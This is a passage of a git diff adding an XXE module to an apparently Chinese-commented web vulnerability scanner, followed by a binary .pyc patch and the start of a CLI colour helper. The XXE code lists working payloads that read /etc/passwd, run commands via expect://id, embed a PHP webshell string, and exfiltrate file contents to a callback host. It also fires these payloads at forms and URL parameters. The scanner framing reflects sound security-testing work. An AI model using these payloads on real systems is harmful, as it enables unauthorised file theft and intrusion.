+            </svg>""",
+            
+            # XXE通过XSLT
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <?xml-stylesheet type="text/xsl" href="#stylesheet"?>
+            <!DOCTYPE doc [
+            <!ENTITY % dtd SYSTEM "file:///etc/passwd">
+            %dtd;
+            ]>
+            <doc>
+            <stylesheet id="stylesheet">
+            <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+            <p>Passwd content: &xxe;</p>
+            </xsl:template>
+            </xsl:stylesheet>
+            </doc>""",
+            
+            # 扩展实体XXE 
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "expect://id" >]>
+            <foo>&xxe;</foo>""",
+            
+            # XXE to RCE (PHP)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=data://text/plain,<?php system($_GET['cmd']); ?>" >]>
+            <foo>&xxe;</foo>""",
+            
+            # XML Parameter Entities
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % remote SYSTEM "{self.callback_domain}">
+            %remote;
+            ]>
+            <root/>""",
+            
+            # XXE基于错误的数据提取
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+            <!ENTITY % load "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%xxe;'>">
+            %load;
+            %error;
+            ]>
+            <foo></foo>""",
+            
+            # 压缩实体引用(ZIP)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/file.txt" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 带有编码过滤器的PHP数据读取 
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
+            <root>&xxe;</root>""",
+            
+            # XXE通过Office文档格式(XML)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE office:document-content [
+            <!ENTITY % remote SYSTEM "{self.callback_domain}">
+            %remote;
+            ]>
+            <office:document-content></office:document-content>"""
+        ]
+        
+        # 合并所有Payload
+        self.payloads = self.basic_payloads + self.advanced_payloads
+        
+        # DTD定义，用于OOB数据渗出
+        self.dtd_content = f"""<!ENTITY % file SYSTEM "file:///etc/passwd">
+        <!ENTITY % combined "<!ENTITY send SYSTEM '{self.callback_domain}?data=%file;'>">
+        %combined;"""
+        
+        # 为OAST检测方法准备的唯一标识符
+        self.oast_identifiers = {}
+        
+    def generate_xxe_payload(self, target_file):
+        """
+        生成针对指定文件的XXE有效载荷
+        
+        Args:
+            target_file: 目标文件路径
+            
+        Returns:
+            str: XXE有效载荷
+        """
+        uuid_str = str(uuid.uuid4()).replace('-', '')[:8]
+        
+        # 有效载荷模板
+        templates = [
+            # 标准文件读取
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % file SYSTEM "file://{target_file}">
+            <!ENTITY % dtd SYSTEM "{self.dtd_server}">
+            %dtd;
+            ]>
+            <root>&send;</root>""",
+            
+            # 错误泄露
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % file SYSTEM "file://{target_file}">
+            <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+            %eval;
+            %error;
+            ]>
+            <root>XXE Test</root>""",
+            
+            # PHP过滤器
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={target_file}">
+            ]>
+            <root>&xxe;</root>""",
+            
+            # 直接引用实体
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "file://{target_file}">
+            ]>
+            <root>&xxe;</root>"""
+        ]
+        
+        # 随机选择一个模板
+        return random.choice(templates)
+        
+    def register_oast_attack(self, param_name, url, payload_type="XXE"):
+        """
+        注册一个OAST攻击用于追踪
+        
+        Args:
+            param_name: 参数名
+            url: 目标URL
+            payload_type: 有效载荷类型
+            
+        Returns:
+            str: 唯一标识符
+        """
+        uuid_str = str(uuid.uuid4()).replace('-', '')[:12]
+        self.oast_identifiers[uuid_str] = {
+            'param': param_name,
+            'url': url,
+            'timestamp': time.time(),
+            'type': payload_type
+        }
+        
+        # 如果OOB服务器可用，注册攻击
+        if hasattr(self, 'oob_server') and self.oob_available:
+            self.oob_server.register_attack(uuid_str, self.oast_identifiers[uuid_str])
+            
+        return uuid_str
+        
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描表单字段: {field.get('name')} @ {url} 的XXE漏洞")
+        
+        # 检查字段类型，只处理可能包含XML内容的字段
+        field_type = field.get('type', '').lower()
+        field_name = field.get('name', '').lower()
+        
+        # 如果不是可能包含XML的字段，则跳过
+        if not (field_type in ['text', 'textarea', 'file'] or 
+                any(xml_hint in field_name for xml_hint in ['xml', 'soap', 'wsdl', 'config', 'data'])):
+            return None
+            
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 依次测试每个XXE Payload
+        for payload in self.payloads:
+            # 注册OAST攻击
+            oast_id = self.register_oast_attack(field['name'], url)
+            
+            # 替换Payload中的UUID
+            payload = payload.replace(self.xxe_id, oast_id)
+            
+            # 构建表单数据
+            form_data = {}
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试XXE Payload: {payload[:100]}...")
+                headers = {'Content-Type': 'application/xml'}
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data, headers=headers)
+                else:
+                    response = self.http_client.get(action_url, params=form_data, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现XXE漏洞",
+                        'details': {
+                            "表单操作": action_url,
+                            "表单方法": method,
+                            "漏洞字段": field['name'],
+                            "有效载荷": payload
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+                
+                # 检查OOB XXE检测结果
+                if hasattr(self, 'oob_server') and self.oob_available:
+                    time.sleep(2)  # 等待可能的回调
+                    if self.oob_server.check_detection(oast_id):
+                        return {
+                            'type': 'XXE',
+                            'subtype': 'Out-of-Band XXE',
+                            'url': url,
+                            'form_action': action_url,
+                            'form_method': method,
+                            'parameter': field['name'],
+                            'payload': payload,
+                            'severity': '高',
+                            'description': f"在表单字段'{field['name']}'中发现带外(OOB)XXE漏洞",
+                            'details': {
+                                "表单操作": action_url,
+                                "表单方法": method,
+                                "漏洞字段": field['name'],
+                                "有效载荷": payload,
+                                "检测方法": "带外(OOB)XXE检测"
+                            },
+                            'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                        }
+            except Exception as e:
+                logger.error(f"测试XXE Payload时发生错误: {str(e)}")
+                
+        # 目标文件特定测试
+        for target_file in self.common_data_files[:5]:  # 限制测试数量
+            payload = self.generate_xxe_payload(target_file)
+            
+            # 构建表单数据
+            form_data = {}
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        form_data[f['name']] = f.get('value', '')
+                        
+            # 提交表单
+            try:
+                logger.debug(f"测试针对 {target_file} 的XXE Payload")
+                headers = {'Content-Type': 'application/xml'}
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data, headers=headers)
+                else:
+                    response = self.http_client.get(action_url, params=form_data, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'target_file': target_file,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现XXE漏洞，可读取文件 {target_file}",
+                        'details': {
+                            "表单操作": action_url,
+                            "表单方法": method,
+                            "漏洞字段": field['name'],
+                            "有效载荷": payload,
+                            "目标文件": target_file
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+            except Exception as e:
+                logger.error(f"测试特定文件XXE Payload时发生错误: {str(e)}")
+            
+        return None
+        
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描URL参数: {param} @ {url} 的XXE漏洞")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则跳过
+        if param not in query_params:
+            return None
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 如果参数名称中不包含可能的XML相关提示，则跳过
+        param_lower = param.lower()
+        if not any(xml_hint in param_lower for xml_hint in ['xml', 'soap', 'wsdl', 'config', 'data']):
+            return None
+            
+        # 依次测试每个XXE Payload
+        for payload in self.payloads:
+            # 注册OAST攻击
+            oast_id = self.register_oast_attack(param, url)
+            
+            # 替换Payload中的UUID
+            payload = payload.replace(self.xxe_id, oast_id)
+            
+            # 构建新的查询参数
+            new_params = query_params.copy()
+            new_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(new_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试XXE Payload: {payload[:100]}...")
+                headers = {'Content-Type': 'application/xml'}
+                
+                # 发送请求
+                response = self.http_client.get(test_url, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现XXE漏洞",
+                        'details': {
+                            "URL": url,
+                            "漏洞参数": param,
+                            "有效载荷": payload
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+                
+                # 检查OOB XXE检测结果
+                if hasattr(self, 'oob_server') and self.oob_available:
+                    time.sleep(2)  # 等待可能的回调
+                    if self.oob_server.check_detection(oast_id):
+                        return {
+                            'type': 'XXE',
+                            'subtype': 'Out-of-Band XXE',
+                            'url': url,
+                            'parameter': param,
+                            'payload': payload,
+                            'severity': '高',
+                            'description': f"在URL参数'{param}'中发现带外(OOB)XXE漏洞",
+                            'details': {
+                                "URL": url,
+                                "漏洞参数": param,
+                                "有效载荷": payload,
+                                "检测方法": "带外(OOB)XXE检测"
+                            },
+                            'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                        }
+            except Exception as e:
+                logger.error(f"测试XXE Payload时发生错误: {str(e)}")
+            
+        return None
+        
+    def _check_xxe_success(self, content):
+        """
+        检查响应内容中是否包含XXE漏洞证据
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否存在XXE漏洞
+        """
+        if not content:
+            return False
+            
+        # 检查是否包含常见敏感文件的特征
+        indicators = [
+            # /etc/passwd文件特征
+            r"root:.*:0:0:",
+            r"nobody:.*:65534:",
+            r"daemon:.*:1:1:",
+            
+            # Windows系统文件特征
+            r"\[fonts\]",
+            r"\[extensions\]",
+            r"for 16-bit app support",
+            
+            # 各种配置文件特征
+            r"<VirtualHost",
+            r"<Directory",
+            r"DocumentRoot",
+            r"Listen 80",
+            r"<IfModule",
+            r"worker_processes",
+            r"http {",
+            r"server {",
+            
+            # PHP配置文件特征
+            r"DB_PASSWORD",
+            r"DB_HOST",
+            r"define\s*\(\s*['\"](DB_|SECURE_AUTH_)",
+            
+            # 基础Base64编码的特征
+            r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?$"
+        ]
+        
+        for indicator in indicators:
+            if re.search(indicator, content):
+                return True
+                
+        # 检查是否包含可能的Base64编码内容
+        base64_pattern = r"([A-Za-z0-9+/]{40,}={0,2})"
+        matches = re.findall(base64_pattern, content)
+        for match in matches:
+            try:
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"root:.*:0:0:", decoded) or 
+                    re.search(r"<\?php", decoded) or 
+                    re.search(r"<!DOCTYPE", decoded) or
+                    re.search(r"<html", decoded)):
+                    return True
+            except:
+                pass
+                
+        return False
+        
+    def _extract_evidence(self, content):
+        """
+        从响应内容中提取XXE漏洞证据
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            str: XXE漏洞证据
+        """
+        # 提取敏感信息作为证据
+        evidence = []
+        
+        # 提取/etc/passwd内容
+        passwd_match = re.search(r"(root:.*:0:0:.*?)\n", content)
+        if passwd_match:
+            evidence.append(f"Found /etc/passwd content: {passwd_match.group(1)}")
+            
+        # 提取可能的Base64编码内容
+        base64_pattern = r"([A-Za-z0-9+/]{40,}={0,2})"
+        matches = re.findall(base64_pattern, content)
+        for match in matches:
+            try:
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                if re.search(r"root:.*:0:0:", decoded) or re.search(r"<\?php", decoded):
+                    evidence.append(f"Found Base64 encoded sensitive data: {decoded[:100]}...")
+            except:
+                pass
+                
+        # 提取Windows文件内容
+        if re.search(r"\[fonts\]", content) or re.search(r"\[extensions\]", content):
+            evidence.append("Found Windows configuration file content")
+            
+        # 提取配置文件内容
+        if re.search(r"DB_PASSWORD", content) or re.search(r"DB_HOST", content):
+            evidence.append("Found database configuration details")
+            
+        if not evidence:
+            # 如果没有找到特定证据，返回内容摘要
+            return f"Suspicious content found: {content[:200]}..."
+        else:
+            return "\n".join(evidence)
+            
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到XXE回调
+        
+        Returns:
+            list: 检测到的XXE回调列表
+        """
+        if hasattr(self, 'oob_server') and self.oob_available:
+            return self.oob_server.detected_xxe
+        return []
+        
+    def close(self):
+        """关闭资源"""
+        if hasattr(self, 'oob_server') and self.oob_available:
+            self.oob_server.stop()
+            
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+        
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/ui/__pycache__/cli.cpython-313.pyc b/xss_scanner/ui/__pycache__/cli.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..1ef21f32669478e4c1836c71d363e4caed591ceb
GIT binary patch
literal 9451
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
F{{b~;1(N^(

literal 0
HcmV?d00001

diff --git a/xss_scanner/ui/cli.py b/xss_scanner/ui/cli.py
new file mode 100644
index 0000000..c5e9936
--- /dev/null
+++ b/xss_scanner/ui/cli.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+命令行界面模块，负责显示扫描器的交互界面
+"""
+
+import os
+import sys
+import time
+import logging
+from datetime import datetime
+
+# 定义颜色代码
+COLORS = {
+    'RED': '\033[91m',
+    'GREEN': '\033[92m',
+    'YELLOW': '\033[93m',
+    'BLUE': '\033[94m',
+    'PURPLE': '\033[95m',
+    'CYAN': '\033[96m',
+    'WHITE': '\033[97m',
+    'BOLD': '\033[1m',
+    'UNDERLINE': '\033[4m',
+    'RESET': '\033[0m'
+}
+
+def colored(text, color):
+    """
+    为文本添加颜色
+    
+    Args:
+        text: 文本内容
+        color: 颜色名称
+        
+    Returns:
+        str: 带颜色的文本
+    """
+    if color not in COLORS:
+        return text
